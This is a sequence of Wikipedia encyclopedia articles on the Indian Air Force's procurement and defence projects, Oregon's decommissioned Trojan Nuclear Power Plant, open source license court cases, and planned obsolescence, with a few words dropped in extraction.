Pilatus PC-7MkII basic trainers, 72 HAL HJT-36 Sitara trainers, 65 HAL Light Combat Helicopters, 6 Airbus A330 MRTT, 56 EADS CASA C-295 aircraft and IAI Harop UCAVs. DRDO and HAL projects Indian defence company HAL and Defense Research Organization DRDO are developing several aircraft for the IAF such as the HAL Tejas Mk2, HAL TEDBF (naval aircraft), HAL AMCA (5th generation aircraft), DRDO AEW&CS (revived from the Airavat Project), NAL Saras, HAL HJT-36 Sitara, HAL HTT-40, HAL Light Utility Helicopter (LUH), DRDO Rustom and DRDO Ghatak UCAV. DRDO has developed the Akash missile system for the IAF and also developed the Prithvi II ballistic missile. HAL is also close to develop its own fifth generation fighter aircraft HAL AMCA which will be inducted by 2028. DRDO has entered in a joint venture with Israel Aerospace Industries (IAI) to develop the Barak 8 SAM. Akash-NG is also being developed by DRDO which will be the same range of Barak 8. DRDO is developing the air-launched version of the BrahMos cruise missile in a joint venture with Russia's NPO Mashinostroeyenia. DRDO has now successfully developed the nuclear capable Nirbhay cruise missile. DRDO and HAL has also engaged in the unmanned combat system. According to this, HAL will develop the whole family of unmanned aircraft by the end of 2024–25 Network-centric warfare The Air Force Network (AFNET), a robust digital information grid that enabled quick and accurate threat responses, was launched in 2010, helping the IAF become a truly network-centric air force. AFNET is a secure communication network linking command and control centres with offensive aircraft, sensor platforms and ground missile batteries. Integrated Air Command and Control System (IACCS), an automated system for Air Defence operations will ride the AFNet backbone integrating ground and airborne sensors, weapon systems and command and control nodes. Subsequent integration with civil radar and other networks shall provide an integrated Air Situation Picture, and reportedly acts as a force multiplier for intelligence analysis, mission control, and support activities like maintenance and logistics. The design features multiple layers of security measures, including encryption and intrusion prevention technologies, to hinder and deter espionage efforts. See also List of Indian Air Force Gallantry Award Winners List of Indian Army Gallantry Award Winners List of historical aircraft of the Indian Air Force References Bibliography External links Official website of The Indian Air Force 1965, IAF Claimed its First Air-to-Air Kill documentary published by IAF Indian Air Force on bharat-rakshak.com Global Security article on Indo-Pakistani Wars Designators Batches of Indian Air Force Career Air Force Government of India Defence agencies of India Military units and formations established in 1932 1931 establishments in India Military history of India during World War II
2885429
https://en.wikipedia.org/wiki/Trojan%20Nuclear%20Power%20Plant
Trojan Nuclear Power Plant
Trojan Nuclear Power Plant was a pressurized water reactor nuclear power plant (Westinghouse design) in the northwest United States, located southeast of Rainier, Oregon, and the only commercial nuclear power plant to be built in Oregon. There was much public opposition to the plant from the design stage. The three main opposition groups were the Trojan Decommissioning Alliance, Forelaws on the Board, and Mothers for Peace. There were largely non-violent protests from 1977, and subsequent arrests of participants. The plant was connected to the grid in December 1975. After 16 years of irregular service, the plant was closed permanently in 1992 by its operator, Portland General Electric (PGE), after cracks were discovered in the steam-generator tubing. Decommissioning and demolition of the plant began the following year and was largely completed in 2006. While operating, Trojan represented more than 12% of the electrical generation capacity of Oregon. The site lies about north of St. Helens, on the west (south) bank of the Columbia River. History The Trojan Powder Company had formerly manufactured gunpowder and dynamite on a site on the banks of the Columbia River, from the town of Rainier, Oregon. In 1967, Portland General Electric chose the site for a new nuclear power plant. Construction began on February 1, 1970; first criticality was achieved on December 15, 1975, and grid connection eight days later on December 23. Commercial operation began on May 20, under a 35-year license to expire in 2011. At the time, the single 1,130 megawatt unit at Trojan was the world's largest pressurized water reactor; it cost $460 million to build Environmental opposition dogged Trojan from its inception, and the opposition included non-violent protests organized by the Trojan Decommissioning Alliance. Direct action protests were held at the plant in 1977 and 1978, resulting in hundreds of arrests. In 1978, the plant went offline on March 17 for routine refueling and was idle for nine months while modifications were made to improve its resistance to This followed the discovery of both major building construction errors and the close proximity of a previously unknown fault. The operators sued the builders, and an undisclosed out-of-court settlement was eventually reached. The Trojan steam generators were designed to last the life of the plant, but it was only four years before premature cracking of the steam tubes was observed. In October 1979, the plant was shut down through the end of the year The plant had an extended shutdown in 1984, with difficulty restarting. In the 1980 election, a ballot measure to ban construction of further nuclear power plants in the state without federally approved waste facilities was approved by the voters 608,412 (53.2%) to 535,049 (46.8%). In 1986, a ballot measure initiated by Lloyd Marbet for immediate closure of the Trojan plant failed 35.7% yes to 64.3% no. This proposal was resubmitted in 1990, and again in 1992 when a similar proposal (by Jerry and Marilyn Wilson) to close the plant was also included. Each measure was soundly defeated by vote margins over 210,000 votes. Although all closure proposals were defeated, the plant operators committed to successively earlier closure dates for the plant. In 1992, PGE spent $4.5 million to successfully defeat ballot measures seeking to close Trojan immediately, rather than within four years, as PGE had At the time, it was the most expensive ballot measure campaign in Oregon history. A week after the election, the Trojan plant suffered another steam generator tube leak of radioactive water, and was It was announced that replacement of the steam generators would be necessary. In December 1992, documents were leaked from the U.S. Nuclear Regulatory Commission showing that staff scientists believed that Trojan might be unsafe In early January 1993, PGE chief executive Ken Harrison announced the company would not try to After 1993 decision not to restart The spent fuel was transferred from cooling pools to 34 concrete and steel storage casks in 2003. In 2005, the reactor vessel and other radioactive equipment were removed from the Trojan plant, encased in concrete foam, shrink-wrapped, and transported intact by barge along the Columbia River to Hanford Nuclear Reservation in Washington, where it was buried in a pit and covered with of gravel, which made it the first commercial reactor to be moved and buried whole. It was awaiting transport to the Yucca Mountain Repository until that project was canceled in 2009. The iconic cooling tower, visible from Interstate 5 in Washington and U.S. Route 30 in Oregon, was demolished in 2006 via dynamite implosion at 7:00 a.m. PDT on Sunday, This event marked the first implosion of a cooling tower at a nuclear plant in the United States. Additional demolition work on the remaining structures continued through 2008. The central office building and the reactor building were demolished by Northwest Demolition and Dismantling in 2008. Remaining are five buildings: two warehouses, a small building on the river side, a guard shack, and offices outside the secured facility. It is expected that demolition of the plant will cost approximately $230 million, which includes the termination of the plant possession-only license, conventional demolition of the building and continuing cost for storage of used nuclear fuel. A number of the air raid sirens that were originally installed within a radius of Trojan, to warn of an incident at the plant that could endanger the general public, continue to stand in the Washington cities of Longview, Kelso, and Kalama. Some of the other sirens, which have been removed, have been repurposed as tsunami warning sirens along the Oregon coast. While there are no plans to remove the remaining sirens, the city of Longview has removed a few of the sirens on an as-needed basis to make way for other projects. Heliport Trojan Heliport was a 60 x 60 ft. (18 x 18 m) private turf heliport located at the power plant. It appears to be defunct at this time. References External links Portland General Electric information about the plant (archived version of page from August 2008 available from archive.org) Local television news coverage of the implosion from many different angles High Country News article providing some of the time line of the plant Energy infrastructure completed in 1976 Buildings and structures in Columbia County, Oregon Nuclear power plants in Oregon Former nuclear power stations in the United States Nuclear power stations using pressurized water reactors Portland General Electric Demolished buildings and structures in Oregon 1976 establishments in Oregon Buildings and structures demolished in 2006 Heliports in the United States 1992 disestablishments in Oregon Former power stations in Oregon Decommissioned nuclear power stations in the United States
62433421
https://en.wikipedia.org/wiki/Open%20source%20license%20litigation
Open source license litigation
Free and open source software is distributed under a variety of free-software licenses which differ significantly from other kinds of software license. Legal action against these licences involves questions about their validity and enforceability. This page lists significant open source license litigation to illustrate the legal system's approach to these licenses. Open source license copyright litigation Jacobsen v Katzer (2008) Jacobsen v Katzer addressed the extent to which a copyright holder of free public use software can control the modification and use of their work by another party. Jacobsen made code available for public download under an open source public license, Artistic License 1.0, which Katzer copied into their own commercial software products without recognition of the source of the code. Jacobsen argued that the terms of the license defined the scope what the code could be used for and that any use outside of these restrictions would be a copyright infringement. The license holder here expressly stated the terms upon which the right to modify and distribute the material depended. The United States Federal Circuit Court of Appeals established that these license terms are enforceable copyright conditions. Katzer had failed to affix the required copyright notices to the derivative software, which therefore was an infringement of the license. The case established that violations of open source licenses can be treated as copyright claims. BusyBox litigation (2007-13) During 2007 to 2009, Software Freedom Law Center (SFLC) filed a series of copyright infringement lawsuits on behalf the principal developers of BusyBox. These lawsuits claimed violations of the GNU General Public License Version 2. In September 2007 they filed a lawsuit against Monsoon Multimedia, Inc. alleging that Monsoon had violated the GPL by including BusyBox code in some of their products without releasing the source code. In October 2007, an SFLC press release announced that the lawsuit had been settled with Monsoon agreeing to comply with the GPL and pay a sum of money to the plaintiffs. In November 2007 they filed a lawsuit against Xterasys Corporation and High-Gain Antennas, LLC. In December 2007, SFLC announced a settlement; Xterasys agreed to stop shipping infringing products until it published the complete source code for the GPL’d code and to pay an undisclosed sum to the plaintiffs. In December 2007 SFLC filed a lawsuit against Verizon Communications, Inc. alleging that Verizon had violated the GPL by distributing BusyBox in wireless routers bundled with the FiOS fiber optic bandwidth service, without providing corresponding source code. A settlement announced In March 2008, included an agreement to comply with the GPL and an undisclosed sum paid to the plaintiffs. In December 2009, they filed a lawsuit against 14 companies, including Best Buy, Samsung, and Westinghouse with the same allegations of violation of the GPL. By the end of September 2013, all of the defendant companies had agreed on settlement terms, except for Westinghouse, against whom default judgment was entered. Free Software Foundation, Inc. v. Cisco Systems, Inc (2009) This was a lawsuit initiated by the Free Software Foundation (FSF) against Cisco Systems on December 11, 2008 in the United States District Court for the Southern District of New York. The FSF claimed that various products sold by Cisco under the Linksys brand had violated the licensing terms of many programs on which FSF held copyright, including GCC, GNU Binutils, and the GNU C Library. Most of these programs were licensed under the GNU General Public License Version 2, and a few under the GNU Lesser General Public License. The Software Freedom Law Center acted as the FSF's lawyers in the case, asking the court to enjoin Cisco from further distributing Linksys firmware that contained FSF copyrighted code, and also asked for damages amounting from all profits that Cisco received "from its unlawful acts." The FSF contended that code to which it held the copyright was found in multiple Linksys models, and in the program QuickVPN. On May 20, 2009 the parties announced a settlement that included Cisco appointing a director to ensure Linksys products comply with free-software licenses, and Cisco making an undisclosed financial contribution to the FSF. Open source license as a contract litigation Artifex Software Inc v Hancom Inc (2017) Leading on from Jacobsen v Katzer this case, from the United States District Court, N.D. California, focused on the breaches of open source software licenses, but extended to contract breaches as well as copyright infringements. Artifex is the exclusive licensor of the software product, ‘Ghostscript’, under the GNU General Public License Version 3. Hancom is a South Korean software company that used Ghostscript in software they were selling. This case concerned Hancom's failure to distribute or offer to provide the source code for their software. The GNU GPL provides that the Ghostscript user agrees to its terms, thus creating a contract, if the user does not obtain a commercial license. Artifex alleged that Hancom did not obtain a commercial license to use Ghostscript, and represented publicly that its use of Ghostscript was licensed under the GNU GPL. These allegations sufficiently plead the existence of a contract. This case establishes that the GNU GPL constitutes a contract between the owner of the source code and the person/company that uses that code through the license. This sets the precedent that allows licensors to bring claims of breach of contract where the terms of a license are not complied with. SCO Group Inc v International Business Machines Corporation (2017) This was a case decided through the United States Court of Appeals for the Tenth Circuit. It covered a complex contractual matrix with claims made in tort across the contractual duties. In the end it created a stir in the open source community as the claims of ownership over code were disputed. Eben Moglen, the counsel for the Free Software Foundation, released a statement regarding the lawsuit: As to its trade secret claims, which are the only claims actually made in the lawsuit against IBM, there remains the simple fact that SCO has for years distributed copies of the kernel, Linux, as part of GNU/Linux free software systems. [...] There is simply no legal basis on which SCO can claim trade secret liability in others for material it widely and commercially published itself under [the GNU GPL Version 2] that specifically permitted unrestricted copying and distribution. The SCO Group announced on May 14, 2003, that they would no longer distribute Linux. SCO said that it would "continue to support existing SCO Linux and Caldera OpenLinux customers and hold them harmless from any SCO intellectual property issues regarding SCO Linux and Caldera OpenLinux products". SCO claimed and maintains that any code that was GPL'd was done by employees without proper authorization, and thus the license did not stand legally. This is supported by the fact that for code to be GPL'd, the copyright owner must put a GPL notice before the code, and SCO itself was not the one to add the notices. Software patenting litigation Diamond v Diehr (1981), Bilski v Kappos (2010), and Alice Corporation Pty Ltd v CLS Bank International (2014) These cases decided in the Supreme Court of United States set out the law around what makes an invention patent eligible in reference to computer programs. It was stated that to transform an abstract idea into a patent eligible process requires more than simply stating the idea followed by the words, “apply it”; accordingly simply implementing a program on a computer is not a patentable application. This is because if you take away the computer then all that is left is the abstract idea, which is not a process or another accepted creation, and is therefore not patentable. The only place a patent eligible process is qualified by its implementation by a computer is where it improves an existing technological process. So computer programs cannot be patented, but can be copyrighted. The Software Freedom Law Center submitted a brief to the United States Court of Appeals in the Federal Circuit for Alice Corporation v CLS Bank to support the long-standing court precedents limiting patent rights for computer programs. The open source community has an interest in limiting the reach of patent law so that free software development is not impeded upon. The SFLC showed its support for the “machine or transformation” test which only allows patents for computer software processes which include a special purpose apparatus not merely a general purpose computer to execute the program. The Court’s decision reflected the ideas set out in the SFLC submission. Enfish LLC v Microsoft Corp (2016) In this case, a software patent was questioned and ruled valid. The ruling was that an invention's ability to run on a general-purpose computer does not preclude it from being patent eligible. Antitrust litigation Wallace v. International Business Machines Corp (2006) This case was decided, at the Court of Appeals for the Seventh Circuit, that in United States law the GNU GPL Version 2 did not contravene federal antitrust laws. This suit came after the dismissed action, Wallace v Free Software Foundation (2006), where the Foundation and the GPL Version 2 specifically came under fire for price fixing. Wallace’s argument was that the ‘copyleft’ system created by the Free Software Foundation is a project with IBM, Novell and Red Hat to undercut the prices of potential rivals. It was argued that this could be governed under antitrust law which regulates predatory pricing. The effect would be to shut down a process where a company or companies undercut the competition to gain a monopoly, and then exploit it by raising the prices. The purpose of the law is to protect consumers from this process, to promote rivalry to keep prices low. However, Mr. Wallace was attempting to use anti-trust law to drive prices up, suggesting that it was impossible to compete with their prices. Wallace had to prove not only an injury to himself but to the market as well under antitrust law, which he failed to do. The claim was quickly dismissed as the number of proprietary operating systems was growing, and there continues to be competition in the market despite some being free of charge. So it was confirmed that the GPL and open source software cannot be challenged by antitrust laws. Open source software fair use litigation Oracle America Inc v. Google Inc (2018) This was a case finally decided in the United States Federal Circuit Court of Appeals in 2018, which concerned the fair use by Google of the source code licensed by Oracle under the GNU GPL Version 2. Google had copied 37 Application Programming Interface packages (APIs) to aid in the building of its free Android software for smartphones. Google had taken these APIs and then written its own implementing code and launched a product which competed with Oracle’s. The conditions of the license were that the improvements of the code, or derivative code, had to be shared for free use. If somebody wanted to avoid this, but still use the APIs, or where they would be competing with the owners of the code, then they would need to pay a licensing fee. Google used the APIs without paying a licensing fee, but competed with Oracle’s product, which Oracle contended was a breach of copyright. The Court of Appeals decided in favor of Oracle, after considering what would make a fair use of the code, with Google failing on a majority of accounts. As of November 15, 2019, the United States Supreme Court has decided to allow appeal to its court on the same question, which now holds $9 billion in damages above Google if they fail again. In April 2021, the Supreme Court ruled in a 6–2 decision that Google's use of the Java APIs fell within the four factors of fair use, bypassing the question on whether APIs can be copyrighted. The decision reversed the Federal Circuit ruling and remanded the case for further review. Open source software trade secrets litigation A Korean case (2005) from the Seoul Central District Court in September, 2005 considered the issue of defendants conducting business for a rival company using source code from a program developed by the company they had previously worked, licensed under a GNU GPL Version 2. Trade secrets are sufficient if their contents are of competitive property value and, unlike patents, are not required to be novel or progressive. The purpose of prohibiting trade secret infringement is to avoid unfair advantage, stopping companies from obtaining a favorable head-start over competitors placing them in a superior position. One defendant retired from their company and kept a copy of the source code privately, providing it to the rival company, shortening the development period by two months. The Court ruled that the GPL was not material to the case. The Defendants argued that it is impossible to maintain trade secrets while being compliant with GPL and distributing the work, so they could not be in breach of trade secrets. This argument was considered without ground and the defendants were sentenced following criminal proceedings. Other/international open source license litigation Planetary Motion v. Techsplosion (2001) United States Court of Appeals, Eleventh Circuit case, “Software distributed pursuant to [the GPL] is not necessarily ceded to the public domain” (dicta). Computer Associates v. Quest (2004) This case decided in the United States District Court, N.D. Illinois, Eastern Division considered the fact that Computer Associate’s source code contains previously known source code (GNU Bison Version 1.25), available under the GPL, does not prevent them from protecting their own source code. There is a special exception in the GPL to allow the use of output files without the usual restrictions for versions of Bison after and including version 1.25. Welte v. Sitecom Germany (2004) In April 2004 a preliminary injunction against Sitecom Germany was granted by Munich District Court after Sitecom refused to cease distribution of Netfilter's GPL'ed software in violation of the terms of the GPL Version 2. The court's justification was:Defendant has infringed on the copyright of plaintiff by offering the software 'netfilter/iptables' for download and by advertising its distribution, without adhering to the license conditions of the GPL. Said actions would only be permissible if defendant had a license grant. Welte v. D-Link (2006) On 6 September 2006 in the District Court of Frankfurt, the gpl-violations.org project prevailed in court litigation against D-Link Germany GmbH regarding D-Link's copyright-infringing use of parts of the Linux Kernel in devices they distributed. The judgment stated that the GPL is valid, legally binding, and stands in German court. AFPA v. Edu4 (2009) September 22, 2009 the Paris Court of Appeals made ruled that the company Edu4 violated the terms of the GNU GPL Version 2 when it distributed binary copies of the remote desktop access software VNC but denied users access to its corresponding source code. Olivier Hugot, attorney of Free Software Foundation France said:Companies distributing the software have been given a strong reminder that the license's terms are enforceable under French law. And users in France can rest assured that, if need be, they can avail themselves of the legal system to see violations addressed and their rights respected...But what makes this ruling unique is the fact that the suit was filed by a user of the software, instead of a copyright holder. It's a commonly held belief that only the copyright holder of a work can enforce the license's terms - but that's not true in France. People who received software under the GNU GPL can also request compliance, since the license grants them rights from the authors. Free/Iliad (2011) This was an October 2008 case from Paris Regional Court (Tribunal de Grande Instance de Paris). Free/Illiad is an ISP; the routers they distribute contains software under GPL Version 2, but Free/Iliad didn't provide the source code nor the GPL text. Free/Illiad's argument was that the routers are their property (not sold to customers) and still on their network, which would not amount to "distribution" in the terms of the GPL. A secret extra-judicial agreement was reached in July 2011. Free has since released the source code and informed users of the GPL software in their routers. China's courts rulings on open-source licensing (2018) The Beijing Intellectual Property Court (BIPC) saw a case from business-software developer Digital Heaven claiming that software developer YouZi had copied the code for three plug-ins contained in its development tool "Hbuilder". The court found in 2018 that YouZi violated copyright, this decision proving to be controversial as the legal test employed by the court differed from the reasoning used by the United States courts. YouZi argued that since Hbuilder is based on a GNU open-source module known as "Aptana", which is licensed under General Public Licence Version 3; HBuilder is also open source software with source code anybody should be entitled to use. The BIPC decided it was only necessary to identify whether the three specific plug-ins used by YouZi are subject to the GPL. The Aptana-GPL Exception License stipulates that the works which are identifiable sections of the modified version and can be seen as independent works, would not fall under the GPL. Without further examination of the open source licences, the court ruled the GPL did not apply to the three plug-ins and therefore Hbuilder could not be considered a derivative work licensed under the GPL. References Free and open-source software Litigation by party
497852
https://en.wikipedia.org/wiki/Planned%20obsolescence
Planned obsolescence
In economics and industrial design, planned obsolescence (also called built-in obsolescence or premature obsolescence) is a policy of planning or designing a product with an artificially limited useful life or a purposely frail design, so that it becomes obsolete after a certain pre-determined period of time upon which it decrementally functions or suddenly ceases to function, or might be perceived as unfashionable. The rationale behind this strategy is to generate long-term sales volume by reducing the time between repeat purchases (referred to as "shortening the replacement cycle"). It is the deliberate shortening of a lifespan of a product to force people to purchase functional replacements. Planned obsolescence tends to work best when a producer has at least an oligopoly. Before introducing a planned obsolescence, the producer has to know that the customer is at least somewhat likely to buy a replacement from them (see brand loyalty). In these cases of planned obsolescence, there is an information asymmetry between the producer, who knows how long the product was designed to last, and the customer, who does not. When a market becomes more competitive, product lifespans tend to increase. For example, when Japanese vehicles with longer lifespans entered the American market in the 1960s and 1970s, American carmakers were forced to respond by building more durable products. History In 1924, the American automobile market began reaching saturation point. To maintain unit sales, General Motors executive Alfred P. Sloan Jr. suggested annual model-year design changes to convince car owners to buy new replacements each year, with refreshed appearances headed by Harley Earl and the Art and Color Section. Although his concept was borrowed from the bicycle industry, its origin was often misattributed to Sloan. Sloan often used the term dynamic obsolescence, but critics coined the name of his strategy planned obsolescence. This strategy had far-reaching effects on the automobile industry, product design field and eventually the whole American economy. The smaller players could not maintain the pace and expense of yearly re-styling. Henry Ford did not like the constant stream of model-year changes because he clung to an engineer's notions of simplicity, economies of scale, and design integrity. GM surpassed Ford's sales in 1931 and became the dominant company in the industry thereafter. The frequent design changes also made it necessary to use a body-on-frame structure rather than the lighter, but less easy to modify, unibody design used by most European automakers. The origin of the phrase planned obsolescence goes back at least as far as 1932 with Bernard London's pamphlet Ending the Depression Through Planned Obsolescence. The essence of London's plan would have the government impose a legal obsolescence on personal-use items, to stimulate and perpetuate purchasing. However, the phrase was first popularized in 1954 by Brooks Stevens, an American industrial designer. Stevens was due to give a talk at an advertising conference in Minneapolis in 1954. Without giving it much thought, he used the term as the title of his talk. From that point on, "planned obsolescence" became Stevens' catchphrase. By his definition, planned obsolescence was "Instilling in the buyer the desire to own something a little newer, a little better, a little sooner than is necessary." The phrase was quickly taken up by others, but Stevens' definition was challenged. By the late 1950s, planned obsolescence had become a commonly used term for products designed to break easily or to quickly go out of style. In fact, the concept was so widely recognized that in 1959 Volkswagen mocked it in an advertising campaign. While acknowledging the widespread use of planned obsolescence among automobile manufacturers, Volkswagen pitched itself as an alternative. "We do not believe in planned obsolescence", the ads suggested. "We don't change a car for the sake of change." In the famous Volkswagen advertising campaign by Doyle Dane Bernbach, one advert showed an almost blank page with the strapline "No point in showing the 1962 Volkswagen, it still looks the same". In 1960, cultural critic Vance Packard published The Waste Makers, promoted as an exposé of "the systematic attempt of business to make us wasteful, debt-ridden, permanently discontented individuals". Packard divided planned obsolescence into two sub categories: obsolescence of desirability and obsolescence of function. "Obsolescence of desirability", a.k.a. "psychological obsolescence", referred to marketers' attempts to wear out a product in the owner's mind. Packard quoted industrial designer George Nelson, who wrote: Design ... is an attempt to make a contribution through change. When no contribution is made or can be made, the only process available for giving the illusion of change is "styling"! Variants Contrived durability Contrived durability is a strategy of shortening the product lifetime before it is released onto the market, by designing it to deteriorate quickly. The design of all personal-use products includes an expected average lifetime permeating all stages of development. Thus, it must be decided early in the design of a complex product how long it should last so that each component can be made to those specifications. Since all matter is subject to entropy, it is impossible for anything to last forever: all products will ultimately break down, no matter what steps are taken. Limited lifespan is only a sign of planned obsolescence if the limit is made artificially short. The strategy of contrived durability is generally not prohibited by law, and manufacturers are free to set the durability level of their products. While often considered planned obsolescence, it is often argued as its own field of anti-customer practices. A possible method of limiting a product's durability is to use inferior materials in critical areas, or suboptimal component layouts which cause excessive wear. Using soft metal in screws and cheap plastic instead of metal in stress-bearing components will increase the speed at which a product will become inoperable through normal usage and make it prone to breakage from even minor forms of abnormal usage. For example, small, brittle plastic gears in toys are extremely prone to damage if the toy is played with roughly, which can easily destroy key functions of the toy and force the purchase of a replacement. The short life expectancy of smartphones and other handheld electronics is a result of constant usage, fragile batteries, and the ability to easily damage them. Prevention of repairs The ultimate examples of such design are single-use versions of traditionally durable goods, such as disposable cameras, where the customer must purchase entire new products after using them just once. Such products are often designed to be impossible to service; for example, a cheap "throwaway" digital watch may have a case which is sealed in the factory, with no designed ability for the user to access the interior without destroying the watch entirely. Manufacturers may make replacement parts either unavailable or so expensive that they make the product uneconomic to repair. For example, many inkjet printers incorporate a replaceable print head which eventually fails. However, the high cost of a replacement forces the owner to scrap the entire device. Other products may also contain design features meant to frustrate repairs, such as Apple's "tamper-resistant" pentalobe screws that cannot easily be removed with common personal-use tools, overuse of glue, as well as denying operation if any third-party component such as a replacement home button has been detected. Front loading washing machines often have the drum bearinga critical and wear-prone mechanical component permanently molded into the wash tub, or even have a sealed outer tub, making it impossible to renew the bearings without replacing the entire tub. The cost of this repair may exceed the residual value of the appliance, forcing it to be scrapped. Bosch, despite the up to 10-year availability of spare parts declared on websites, assembles in the popular MaxoMixx mixers an easily breaking plastic latch, refusing to sell the replacement latch to the user and proposing to replace the entire drive consisting of many elements as a single spare part, which is almost equivalent to buying a new device. According to Kyle Wiens, co-founder of online repair community iFixit, a possible goal for such a design is to make the cost of repairs comparable to the replacement cost, or to prevent any form of servicing of the product at all. In 2012, Toshiba was criticized for issuing cease-and-desist letters to the owner of a website that hosted its copyrighted repair manuals, to the detriment of the independent and home repair market. Batteries Throughout normal use, batteries lose their ability to store energy, output power, and maintain a stable terminal voltage, which impairs computing speeds and eventually leads to system outages in portable electronics. Some portable products highly relied upon in the post-PC era, such as mobile phones, laptops, as well as electric toothbrushes, are designed in a way that denies end-users the ability to replace their batteries after those have worn down, therefore leaving an aging battery trapped inside the device, which limits the product lifespan to its shortest-lived component. While such a design can help make the device thinner, it makes it difficult to replace the battery without sending the entire device away for repairs or purchasing an entirely new device. On a device with a sealed back cover, a manual (forced) battery replacement might induce permanent damage, including loss of water-resistance due to damages on the water-protecting seal, as well as risking serious, even irreparable damage to the phone's main board as a result of having to pry the battery free from strong adhesive in proximity to delicate components. Some devices are even built so that the battery terminals are covered by the main board, requiring it to be riskily removed entirely before disconnecting the terminals. The manufacturer or a repair service might be able to replace the battery. In the latter case, this could void the warranty on the device. As such, it forces users who wish to keep their device functional longer to limit their use of energy-demanding device functionality and to forego full recharging. The practice in phone design started with Apple's iPhones and has now spread out to most other mobile phones. Earlier mobile phones (including water-resistant ones) had back covers that could be opened by the user in order to replace the battery. Perceived obsolescence Obsolescence of desirability or stylistic obsolescence occurs when designers change the styling of products so trendsetting customers will purchase the latest styles. Many products are primarily desirable for aesthetic rather than functional reasons. An example of such a product is clothing. Such products experience a cycle of desirability referred to as a "fashion cycle". By continually introducing new aesthetics, and retargeting or discontinuing older designs, a manufacturer can "ride the fashion cycle", allowing for constant sales despite the original products remaining fully functional. Sneakers are a popular fashion industry where this is prevalent—Nike's Air Max line of running shoes is a prime example where a single model of shoe is often produced for years, but the color and material combination ("colorway") is changed every few months, or different colorways are offered in different markets. This has the upshot of ensuring constant demand for the product, even though it remains fundamentally the same. Motor vehicle platforms typically undergo a midlife "facelift"—a cosmetic rather than an engineering change for the purpose of cost effectively increasing customer appeal by making previously manufactured versions of the same fundamental product less desirable. The most simplistic way to achieve this outcome is to offer new paint colors. To a more limited extent this is also true of some personal-use electronic products, where manufacturers will release slightly updated products at regular intervals and emphasize their value as status symbols. The most notable example among technology products are Apple products. New colorways introduced with iterative “S” generation iPhones (e.g. the iPhone 6S’ "Rose Gold") entice people into upgrading and distinguishes an otherwise identical-looking iPhone from the previous year's model. Some smartphone manufacturers release a marginally updated model every 5 or 6 months compared to the typical yearly cycle, leading to the perception that a one-year-old handset can be up to two generations old. A notable example is OnePlus, known for releasing T-series devices with upgraded specifications roughly 6 months after a major release device. Sony Mobile utilised a similar tactic with its Xperia Z-series smartphones. Systemic obsolescence Planned systemic obsolescence is caused either by the withdrawal of investment, or a product becoming obsolete through continuous development of the system in which it is used in such a way as to make continued use of the original product difficult. Common examples of planned systemic obsolescence include changing the design of screws or fasteners so that they cannot easily be operated on with existing tools, thereby frustrating maintenance. This may be intentionally designed obsolescence, a withdrawal of investment or standards being updated or superseded. For example, serial ports, parallel ports, and PS/2 ports have largely been supplanted or usurped by USB on newer PC motherboards since 2000s. Programmed obsolescence In some cases, notification may be combined with deliberate artificial disabling of a functional product to prevent it from working, thus requiring the buyer to purchase a replacement. For example, inkjet printer manufacturers employ smart chips in their ink cartridges to prevent them from being used after a certain threshold (number of pages, time, etc.), even though the cartridge may still contain usable ink or could be refilled (with ink toners, up to 50 percent of the toner cartridge is often still full). This constitutes "programmed obsolescence", in that there is no random component contributing to the decline in function. In the Jackie Blennis v. HP class action suit, it was claimed that Hewlett Packard designed certain inkjet printers and cartridges to shut down on an undisclosed expiration date, and at this point customers were prevented from using the ink that remained in the expired cartridge. HP denied these claims, but agreed to discontinue the use of certain messages, and to make certain changes to the disclosures on its website and packaging, as well as compensating affected customers with a total credit of up to $5,000,000 for future purchases from HP. Samsung produces laser printers that are designed to stop working with a message about imaging drum replacing. There are some workarounds for users, for instance, that will more than double the life of the printer that has stopped with a message to replace the imaging drum. In 2021, Canon disabled the scanning function of its Canon Pixma MG6320 all-in-one printers whenever an ink cartridge was out of ink. A class action lawsuit was filed. Software lock-out Another example of programmed obsolescence is making older versions of software (e.g. Adobe Flash Player or YouTube's Android application) unserviceable deliberately, even though they would technically, albeit not economically, be able to keep working as intended. Where older versions of software contain unpatched security vulnerabilities, such as banking and payment apps, deliberate lock out may be a risk-based response to prevent the proliferation of malware in those older versions. If the original vendor of the software is no longer in business, then disabling may occur by another software author as in the case of a web browser disabling a plugin. Otherwise, the vendor who owns a software ecosystem may disable an app that does not comply with a key policy or regulation, such as the processing of personal data to protect user privacy, though in other cases, this does not exclude the possibility of "security reasons" being used for fearmongering. This could be a problem for the user, because some devices, despite being equipped with appropriate hardware, might not be able to support the newest update without modifications such as custom firmware. Additionally, updates to newer versions might have introduced undesirable side effects, such as removed features or compulsory changes, or backwards compatibility shortcomings which might be unsolicited and undesired by users. Software companies sometimes deliberately drop support for older technologies as a calculated attempt to force users to purchase new products to replace those made obsolete. Most proprietary software will ultimately reach an end-of-life point at which the supplier will cease updates and support, usually because the cost of code maintenance, testing and support exceed the revenue generated from the old version. As free software and open source software can usually be updated and maintained at lower cost, the end of life date can be later. Software that is abandoned by the manufacturer with regard to manufacturer support is sometimes called abandonware. Legal obsolescence Legal obsolescence refers to the undermining of product usability through legislation, as well as facilitate purchasing a new product by offering benefits. For example, governments wanting to increase electric vehicle ownership could increase the replacement rate of cars by subsidising them. Several cities such as London, Berlin, Paris, Antwerp and Brussels have introduced low-emission zones (LEZ) banning older diesel cars. People using such cars in these zones must replace them. Laws and regulations In 2015 the French National Assembly established a fine of up to €300,000 and jail terms of up to two years for manufacturers planning the failure of their products. The rule is relevant not only because of the sanctions that it establishes but also because it is the first time that a legislature recognized the existence of planned obsolescence. These techniques may include "a deliberate introduction of a flaw, a weakness, a scheduled stop, a technical limitation, incompatibility or other obstacles for repair". The European Union is also addressing the practice. The European Economic and Social Committee (EESC), an advisory body of the EU, announced in 2013 that it was studying "a total ban on planned obsolescence". It said replacing products that are designed to stop working within two or three years of their purchase was a waste of energy and resources and generated pollution. The EESC organised a round table in Madrid in 2014 on 'Best practices in the domain of built-in obsolescence and collaborative consumption' which called for sustainable consumption to be a customer right in EU legislation. Carlos Trias Pinto, president of the EESC's Consultative Commission on Industrial Change supports "the introduction of a labeling system which indicates the durability of a device, so the purchaser can choose whether they prefer to buy a cheap product or a more expensive, more durable product". In 2015, as part of a larger movement against planned obsolescence across the European Union, France passed legislation requiring that appliance manufacturers and vendors declare the intended product lifespans, and to inform purchasers how long spare parts for a given product will be produced. From 2016, appliance manufacturers are required to repair or replace, free of charge, any defective product within two years from its original purchase date. This effectively creates a mandatory two-year warranty. Critics and supporters Shortening the replacement cycle has critics and supporters. Philip Kotler argues that: "Much so-called planned obsolescence is the working of the 